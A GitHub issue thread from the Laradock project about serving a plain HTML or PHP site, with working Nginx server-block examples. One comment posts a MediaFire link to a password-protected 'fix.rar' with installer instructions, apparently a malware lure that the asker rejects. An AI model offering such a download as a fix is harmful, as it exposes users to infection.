### ISSUE TITLE
More Question than Issue: How can I setup a simple html / php landing page

### ISSUE THREAD

**Issue by msslgomez** [laradock/laradock#3544]
### Description:

Is there a way to have Laradock with multiple projects where one of the folders is a simple html/php single webpage? 

### Steps to reproduce the issue:

1.Create new folder as if it were a Laravel project
2.Add only an `index.html` file with some sample code
3.Add url in hosts and docker-compose.yml and I also copy/pasted a config file that was from a Laravel project that works,
4. Turned off container and started it again
5. Go to url and get a `404 not found`

Any help is greatly appreciated! Thanks.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by msslgomez** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

I'm not installing that. What is this supposed to do except give my computer a virus?

**Comment by TechnoSpelie** [comment]
I agree, cuz idk why i clicked it and it's keeping sending this comments everywhere insanely

**Comment by msslgomez** [comment]
> I agree, cuz idk why i clicked it and it's keeping sending this comments everywhere insanely

oh damn, lol sorry

**Comment by vhgah** [comment]
Hey! This is actually pretty simple. Laravel is just one way to build a website — but you can use anything you like, as long as you understand the basics, like how a web server works. In this case, it all comes down to Nginx.
If you only need to serve a static website (just HTML, CSS, and JS), you can do it like this:
### 📁 Project structure:
```
/projects/simple-html/index.html
```
### 🛠 Nginx config (simple-html.conf):
Create a config file like this inside laradock/nginx/sites
```
server {
    listen 80;
    server_name simple-html.test;

    root /var/www/simple-html;
    index index.html;

    location / {
        try_files $uri $uri/ =404;
    }
}
```
### 📝 Notes:
- PHP is not needed at all.
- Don’t forget to add this line to your ```/etc/hosts``` file:
```
127.0.0.1 simple-html.test
```
or you want to set up for a simple PHP page.
### 📁 Project Structure
Your project folder should look like this:
```
/projects/simple-php/index.php
```
This is where you write your PHP code — no Laravel needed.
### 🛠 Nginx Configuration (simple-php.conf)
```
server {
    listen 80;
    server_name simple-php.test;

    root /var/www/simple-php;
    index index.php index.html;

    location / {
        try_files $uri $uri/ =404;
    }

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_pass php-upstream;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```

**Comment by Mahmoudz** [comment]
Thanks for the question. You can serve a plain html/php folder by adding an nginx site config pointing at that directory, which works fine on current images. Closing; please reopen if you get stuck.
